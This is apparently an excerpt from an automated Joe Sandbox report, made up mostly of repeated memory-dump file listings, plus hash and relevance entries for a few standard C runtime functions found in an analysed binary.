                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                                                                                                  • Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                                                  • Instruction ID: c53fafddc465433499df8f720250a1c6099257d3a9e3fa3b0491c811a430a080
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DB11232D046859FDB11CF28C8817BEBBF5EF55350F14816AD8D5EB242D6399D02EBA0
                                                                                                                                                                                                                                                  Function 00F6FCC0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 322COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __fassign
                                                                                                                                                                                                                                                  • String ID: bZ+,
                                                                                                                                                                                                                                                  • API String ID: 3965848254-2515065464
                                                                                                                                                                                                                                                  • Opcode ID: 0dbd825e7868de92c96b95c6dd1f226aeb3b143787267a23da2861780d7e4924
                                                                                                                                                                                                                                                  • Instruction ID: 9d2c709e2d2992320a45ad1d39b51ae098210db91b0164408d80e9c03ae037a8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dbd825e7868de92c96b95c6dd1f226aeb3b143787267a23da2861780d7e4924
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5BC1CC71D002589FCF15CFA8D880AEDBBB5AF49314F28416AE859FB342D731AD46DB50
                                                                                                                                                                                                                                                  Function 00F326B0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00F32846
                                                                                                                                                                                                                                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00F328E0
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ___std_exception_copy___std_exception_destroy
                                                                                                                                                                                                                                                  • String ID: bZ+,
                                                                                                                                                                                                                                                  • API String ID: 2970364248-2515065464
                                                                                                                                                                                                                                                  • Opcode ID: 5853d5812c1bbc40604b9951161dc6ba2e61b38693dee146c2668e531e94e5e1
                                                                                                                                                                                                                                                  • Instruction ID: 5caffe04c73e2c0b85009334aa298d60b749a6f8a2ffcd8043132fc08b652cfd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5853d5812c1bbc40604b9951161dc6ba2e61b38693dee146c2668e531e94e5e1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61717F71E002489BDB04DFA8CC85BDDFBB5FF59310F14811EE815A7282EB74A944DBA5
                                                                                                                                                                                                                                                  Function 00F3DBE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
